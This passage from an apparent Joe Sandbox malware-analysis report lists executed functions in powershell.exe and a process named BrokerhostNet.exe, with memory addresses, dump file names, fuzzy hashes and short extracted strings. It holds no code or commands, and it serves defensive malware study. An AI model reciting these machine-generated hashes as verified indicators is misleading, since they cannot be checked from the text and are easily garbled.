Instruction ID: c566b0446571b1b202708e4a8accaff3b77d1c5caeb67e9b55a4e0150a067685
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 82E0E531B0C808CFDA78DA4CE0519A977E1FB9833571201BAD14EC75A1CA22ED518B80

Function 00007FFD9BA9A2C9 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2202075280.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412d2f7740cb54d64ee8d9d211dc54e6f7e708b7945f7fb02fbb36e98d0dbfd8
Instruction ID: e3f06a35218f66a17bce966e001104cbc33f3dc1a0472283eb7035b9b264ebea
Opcode Fuzzy Hash: 412d2f7740cb54d64ee8d9d211dc54e6f7e708b7945f7fb02fbb36e98d0dbfd8
Instruction Fuzzy Hash: 35E01234804A8C8F8B48EF18C8598EA7BA0FF68205B01029BE81DC7120DB719A58CBC2

Analysis Process: powershell.exePID: 8060, Parent PID: 7844COMMON

Executed Functions

Function 00007FFD9BAA62F3 Relevance: 2.1, Strings: 1, Instructions: 874COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9BAA6301

Memory Dump Source

Source File: 0000000F.00000002.2194375817.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID: N_^
API String ID: 0-3769343188
Opcode ID: 87d2a57341e480971200333381852fd28c52fe20c148125ee03e85000eda5d8d
Instruction ID: 46fb64fe79aac32ae11652bc7494901d3e2922378a47b010cda7eb28e93c5a16
Opcode Fuzzy Hash: 87d2a57341e480971200333381852fd28c52fe20c148125ee03e85000eda5d8d
Instruction Fuzzy Hash: CE427C32F0D65A4FDB64EB9CD8A19E97BA1EF54329B050177D08CCB093DE64A846C7E0

Function 00007FFD9BAAA9D0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2194375817.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4774b57dd8a6ae23f2a126a199d65ef245dd1bb1e0face9aa390c6354d35dd9
Instruction ID: acb5ec091f34d853d6a89aa94d14c80973b897102410319d0c853f8184c74e42
Opcode Fuzzy Hash: f4774b57dd8a6ae23f2a126a199d65ef245dd1bb1e0face9aa390c6354d35dd9
Instruction Fuzzy Hash: 3651773160EB890FD359DB2CC8A08647BE1EF56314B1501BFD0CAC71A3D92AAC47C751

Function 00007FFD9BB7673D Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 871ec152f514a2abba00bcc8685c1f00badef3d1bd1924aa81d00bffb49d4326
Instruction ID: fd6ceebc7e7ea91acf5dcfc94924284820a592c6caab21a358f1d0ee353f5125
Opcode Fuzzy Hash: 871ec152f514a2abba00bcc8685c1f00badef3d1bd1924aa81d00bffb49d4326
Instruction Fuzzy Hash: 6251E722B0F6C94FEBA5EBA844A55687BE0FF15258B1901FFC44ECB5E7D9189C448341

Function 00007FFD9BAA9738 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2194375817.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd9924f3a0e537a231788d391e126ef4f5a2c7d9e2dbb7b664e57775d6fac08
Instruction ID: 9f0b62fa687d2a554670c567d4eeef2c4ac1f67a1bd167e0ce02d7a7bed4aaab
Opcode Fuzzy Hash: 6cd9924f3a0e537a231788d391e126ef4f5a2c7d9e2dbb7b664e57775d6fac08
Instruction Fuzzy Hash: 02414A31E0EB484FEB189F5C9C5A6A8BBE1FF94310F10412FE44883292DA60BD1587D2

Function 00007FFD9BB764D3 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ac42013a219859a7537bd5e365c54a315f85aceeca43ac845dcf5ef8cfbc3d
Instruction ID: 1ec0eb809c36dea2d4aab774853e8b48e46f7d73dcb3f1179899886f7c13ec0c
Opcode Fuzzy Hash: 18ac42013a219859a7537bd5e365c54a315f85aceeca43ac845dcf5ef8cfbc3d
Instruction Fuzzy Hash: 40412932B0E68D4FEBA5EBA854A15B8B7D1FF55228B1901FFC44EC75E7D918AC018341

Function 00007FFD9B98E380 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2193216514.00007FFD9B98D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B98D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9b98d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54411b624003d3468d49b78138ae852e8257220ec963f88f1e4d3d5a791f66a
Instruction ID: 904a3a7df19d1826e6a24ca9f98ce9374064d035b2359489313c8ae2d73f1b1f
Opcode Fuzzy Hash: b54411b624003d3468d49b78138ae852e8257220ec963f88f1e4d3d5a791f66a
Instruction Fuzzy Hash: 4841247190EFC85FE7668B3898659523FF0EF52320B1605EFD088CB1A3D625AC46C792

Function 00007FFD9BB7662B Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572693357f9ca5b33148f19aade1f7b90fa696234e44e82836983ec6856a654e
Instruction ID: 5cc0f27fab8bf80d30ec241e54d9d8491a23f60aba34baec608d01b636325a15
Opcode Fuzzy Hash: 572693357f9ca5b33148f19aade1f7b90fa696234e44e82836983ec6856a654e
Instruction Fuzzy Hash: 7931D562B0F6DA4FEBA1ABA844B1578BBD0FF15258B1904FEC44EC74E7D9186C458301

Function 00007FFD9BB76634 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4def53572eebd166bc77af6a52bceba969bf3d144dbf2e3dbbfbd634b15457b7
Instruction ID: efc2f89782dfe3f77fe7d4ebc6afd86d31839bd730d54c318093aaf4717b9da0
Opcode Fuzzy Hash: 4def53572eebd166bc77af6a52bceba969bf3d144dbf2e3dbbfbd634b15457b7
Instruction Fuzzy Hash: 75310662B0F7C94FE7A29BA844B15787BA0FF15218B5A00FFC48EC74E7D9189C058301

Function 00007FFD9BAAA64C Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2194375817.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0cfa580dc896f610ba8637df79646dba6bffce3d2992df2b8e64fe73adb8f8
Instruction ID: da7c0d36e20515ea9fc22224f920d83f6a7c343027f1f13ec12d93300b9e2dae
Opcode Fuzzy Hash: 9e0cfa580dc896f610ba8637df79646dba6bffce3d2992df2b8e64fe73adb8f8
Instruction Fuzzy Hash: E521F83090CA4C4FEB58DF9CD84A7E97BF0EB56321F04416BD449C7156DA74A446CBA1

Function 00007FFD9BAAA114 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2194375817.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5efc62a8ef4641564c6b6c12b856b9450882bfb27370fd0beba5af1327a314
Instruction ID: 7553cc4219c025fb8062fbc06d900dade9e31aebb6202905f23fb457e4e50387
Opcode Fuzzy Hash: 5f5efc62a8ef4641564c6b6c12b856b9450882bfb27370fd0beba5af1327a314
Instruction Fuzzy Hash: 1601D67690E7C88FDB57DB2488291547FB0AF27204B1A01DBD489CB0B3D6695958C763

Function 00007FFD9BAA33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2194375817.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9baa0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45

Function 00007FFD9BB74400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a8c657a15cb19501fdb7f9c106162769b1487b8f31e62531e4a63b378489f0
Instruction ID: 1caab9ea024e568fec250febd4f163286199a81f50557df03cb6fd29ed74d983
Opcode Fuzzy Hash: a5a8c657a15cb19501fdb7f9c106162769b1487b8f31e62531e4a63b378489f0
Instruction Fuzzy Hash: 86F05E32B0E5498FD768EA5CE4A18A877E0FF4532575600FAE15DC74B3DA25AC50C750

Function 00007FFD9BB7414D Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f76d12b2cb3de4a12e6639bb71867d683a2fb11416f5257d48aa7138a792c4
Instruction ID: 1e42088dbf854c0b1d616dc3cd674e71c07e251532f85b17e6ade6fe901a04d5
Opcode Fuzzy Hash: 60f76d12b2cb3de4a12e6639bb71867d683a2fb11416f5257d48aa7138a792c4
Instruction Fuzzy Hash: A0F05E32B1E5498FD768EA4CE49189877E4FF5532571600AAE15DC79B2CA25EC418B40

Function 00007FFD9BB741D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: a48d19ca9b457f5fdd87450139b277458c3dec432f5ff8fd0266195825fdbe6c
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 34E0123171C4088FD678EA4CE0919AD77E5FB9833571201BBD14EC7971CA31ED518B80

Function 00007FFD9BB73FFB Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2196122068.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5881744dedb7435f24ed7c2740c36c8369889c398f561fbccdb9914367af417e
Instruction ID: 9d6abe2e05589cee776fb1ae52f4ecd818221c177cccb32d817d124382e17eb1
Opcode Fuzzy Hash: 5881744dedb7435f24ed7c2740c36c8369889c398f561fbccdb9914367af417e
Instruction Fuzzy Hash: 7AE04F31A0D0098ED628AA88E4868EC77E4EF51336B12007AD21ED7CB2DB32E951CA40

Analysis Process: BrokerhostNet.exePID: 5800, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAC0D4C Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FFD9BAC0DF3

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 73665aeb5985eb35f2554b645b585fde3cd149f451a60b6855f61870370f55f6
Instruction ID: 496965e6e6a61c8ff226cf873371b91905cc4f7bfe4930ee901cc2cf17f526b8
Opcode Fuzzy Hash: 73665aeb5985eb35f2554b645b585fde3cd149f451a60b6855f61870370f55f6
Instruction Fuzzy Hash: 9B91F571A19A9D4FE759EB6C88797A87BE1FF59314F4102BAD049C72E6CBB818018740

Function 00007FFD9BAC0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9BAC0B46
c9, xrefs: 00007FFD9BAC0B56
!k9, xrefs: 00007FFD9BAC0B4E

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 92d9fde9c17d6cb431c0c4ac88fa4b8f5b1c1623687e8ed0cc0120f85310ee19
Instruction ID: 874f6bbd3b07c9d5a51330af21ae6bc675e894aa35a0a50884c814c834d1ebcd
Opcode Fuzzy Hash: 92d9fde9c17d6cb431c0c4ac88fa4b8f5b1c1623687e8ed0cc0120f85310ee19
Instruction Fuzzy Hash: 5601D12776B95D8BC611AB3DB8500E8BB50EA83136B8603FBD844CB1A2E615185FC7D0

Function 00007FFD9BAE5941 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAE5926

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bae1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 31449af14e1fb8a9efa74b1a24089fc360b7715fa8ba1978e7cc2df2cda64c51
Instruction ID: 87cfee6555987dd4275140d9eab9fa10fd60b9ae7cf187a9e32605eff6a69c8b
Opcode Fuzzy Hash: 31449af14e1fb8a9efa74b1a24089fc360b7715fa8ba1978e7cc2df2cda64c51
Instruction Fuzzy Hash: 1D310A21B0E55D0FEB69E7B898645B83791EF6A310B1641BAD44EC71F3DD5C6D038381

Function 00007FFD9BAE5909 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAE5926

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bae1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: c032674bf88675ccc17ce6d293eef9e5a6f571d730e0c66fdb3ce3b3214f60c1
Instruction ID: 6102b3ab0057281583513010b32cdb987317819f298aa9876bd7740d5e1e2aa0
Opcode Fuzzy Hash: c032674bf88675ccc17ce6d293eef9e5a6f571d730e0c66fdb3ce3b3214f60c1
Instruction Fuzzy Hash: F9F0F66191F3C80FDB52AB74486A4587FE0DF66210B4A40FEC045CB0F3E96D9945C301

Function 00007FFD9BAFB019 Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

cG, xrefs: 00007FFD9BAFB020

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: cG
API String ID: 0-1113159883
Opcode ID: e0565d9753709f041d1d10b37c52009305751346980bb8a13a79b1433f7ccfc0
Instruction ID: d3b437cbc99f5e66b7abb6748d225183e5ebedd0f34557202f47b95f2a35738d
Opcode Fuzzy Hash: e0565d9753709f041d1d10b37c52009305751346980bb8a13a79b1433f7ccfc0
Instruction Fuzzy Hash: 52F0F610B1AA0E5FE6A8A79840B93F439E2EF58300F444075E00CC31E3DE6C6A448741

Function 00007FFD9BAFA1E9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAFA206

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 93660fc0cbbb5e6fab083018cb7ede9dd07e3fc40c5c0bdc00afa65c6840a78a
Instruction ID: 694791a845f6e8e02619d9b2477f5ac650f3f281fa5e44ff40b4ab98b29b2403
Opcode Fuzzy Hash: 93660fc0cbbb5e6fab083018cb7ede9dd07e3fc40c5c0bdc00afa65c6840a78a
Instruction Fuzzy Hash: CCE0927160E3C44FC71AEB7488698557F70EE6720174A42EFC045CF2A7EA2DC889C701

Function 00007FFD9BAFA159 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAFA176

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 13bc0de3752badaf8445cf1d3a6d6ef51417b8373ad3082208b33891a88fa3e0
Instruction ID: 35be950487dd425551556f58b5b91b75965d366b95b930d0b60914b91fc6b70f
Opcode Fuzzy Hash: 13bc0de3752badaf8445cf1d3a6d6ef51417b8373ad3082208b33891a88fa3e0
Instruction Fuzzy Hash: 6CE0927060E3C44FC71AEB7488688547F60EE6B20174A42EFC046CF2A7EA2DC889C701

Function 00007FFD9BAFA999 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAFA9B6

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 05ffe397c70e16f1d5029ce16c5daaf21e093966c320f32737e25c0ab1f4d9eb
Instruction ID: fffa87ebe07135b09cc2acd22494570b0c7225c402cc4824a43e84e97d21d98c
Opcode Fuzzy Hash: 05ffe397c70e16f1d5029ce16c5daaf21e093966c320f32737e25c0ab1f4d9eb
Instruction Fuzzy Hash: AFE01A7154E7C44FCB16EB7488AA9457FA0EE67310B8B41EEC085CF1B3E62D8849C701

Function 00007FFD9BAF1C89 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAF1CA6

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 4686975250a2108a854eacb0572748fff883cb99abd202a3fdf5495ab1336d5c
Instruction ID: f9c494e1b66bdade3edd32c36c7729225ffec5d302ef2530908a8a90b1d1c956
Opcode Fuzzy Hash: 4686975250a2108a854eacb0572748fff883cb99abd202a3fdf5495ab1336d5c
Instruction Fuzzy Hash: 25E0E57154E7C44FCB5AEB75886A9547FA0AE6721078A40EEC085CF1B3E6298949C701

Function 00007FFD9BAD1042 Relevance: .9, Instructions: 887COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bad0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c5063b7453ea192d7c471b187fbdf3c94ec1bfa0aaa44390ba86fc6279610f
Instruction ID: 2c663ee81458364c725fe556758e9da50f478f0487fd00f765fc2fc772a46946
Opcode Fuzzy Hash: 66c5063b7453ea192d7c471b187fbdf3c94ec1bfa0aaa44390ba86fc6279610f
Instruction Fuzzy Hash: 0C52C321B1D91E4FEBA8FB6884A56B87392FFA8350F0542B9D01DC32D7DD78AD418780

Function 00007FFD9BAF3325 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bf422ebb8f9f3eac354a5065191c158879a0296965458567818338d55b7718
Instruction ID: f545da5a0cfe96ae6323cef42927becb05edb5c772d6ca5213c58bf95290799a
Opcode Fuzzy Hash: a4bf422ebb8f9f3eac354a5065191c158879a0296965458567818338d55b7718
Instruction Fuzzy Hash: B3911421B2DB4E0FEBACEB5884766B476C2EF98354F4441BAE44EC71D7DD68AD418380

Function 00007FFD9BAFA71F Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84105efb09c356086c8656813cd452cf838b2402cfc0aa7ad5a1b9bb18559205
Instruction ID: e259f8f45c6247de96688edfe8070b3b35df81dc2b6a2b52cfd9510e5bb04b71
Opcode Fuzzy Hash: 84105efb09c356086c8656813cd452cf838b2402cfc0aa7ad5a1b9bb18559205
Instruction Fuzzy Hash: 16115C22B0C7194BD724B66CB8A54E437E0CF7922E708027BE45DCB2D7DC0868468384

Function 00007FFD9BAE9201 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bae1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee4a071315a06800a36ba43659c11816a20f3c36db9ee078effd35eeb05ce92
Instruction ID: 4989edca6c13147f64690fe4289fbcaec6384e3ea68a1af3840046b6b298fc43
Opcode Fuzzy Hash: 3ee4a071315a06800a36ba43659c11816a20f3c36db9ee078effd35eeb05ce92
Instruction Fuzzy Hash: C181C331B19A1E4FDB58EB68C468AA977E1FF58314F414279E01DC72E6DF38A842C741

Function 00007FFD9BAC08E8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 275572c1e172d4ed7b869b84376736c34b648cbf87f7217b6db7ade85c475d1e
Instruction ID: 7ff932ff25b48581cc79ba61ca242fe4bf602ddbf6151af02d989f83726be627
Opcode Fuzzy Hash: 275572c1e172d4ed7b869b84376736c34b648cbf87f7217b6db7ade85c475d1e
Instruction Fuzzy Hash: 6831253130D9194FE768EB5CE88A9B977D0EF5932130502BBE48AC7176DD51AC8287C5

Function 00007FFD9BAC095D Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e3795c63a538bb09eafc37b8ea691117df39694d29c178631273cbea082d77
Instruction ID: d0f63fcdd7617fda000da8ca4b48102b3e5f86fdd2c4f3eb16e43ec6cf7e9b6f
Opcode Fuzzy Hash: 21e3795c63a538bb09eafc37b8ea691117df39694d29c178631273cbea082d77
Instruction Fuzzy Hash: 62310021B0D51D1FE768F7ACA4666F873C1DF58336B1401BAE40EC71E7CD189C418285

Function 00007FFD9BAC0960 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f28c9295209ed4383c335d39907b43901d491cb6eef9e0b37af60de6414d155a
Instruction ID: fb6e6e4aba526f435df0d03828fdb0e2ab207549258cf5419ad3a7a38dfd2866
Opcode Fuzzy Hash: f28c9295209ed4383c335d39907b43901d491cb6eef9e0b37af60de6414d155a
Instruction Fuzzy Hash: 9B31FB21B1D51D1FE768F7AC646AAF873C1DF5833AB1541BAE40EC72EBCD18AC418285

Function 00007FFD9BAC0998 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3423b6d30f0f6d1ec6af17f8d48e867cce9004757864c60c92b196e55ed62c53
Instruction ID: 6f8258001ef7972914b9668f7f030350d47947329a2586113e10a6f8ee55028e
Opcode Fuzzy Hash: 3423b6d30f0f6d1ec6af17f8d48e867cce9004757864c60c92b196e55ed62c53
Instruction Fuzzy Hash: 0F210620B1991D1FE798B76C847AB7972C2EF98325B0101B9E40EC33EBDD58AC418345

Function 00007FFD9BAC1171 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
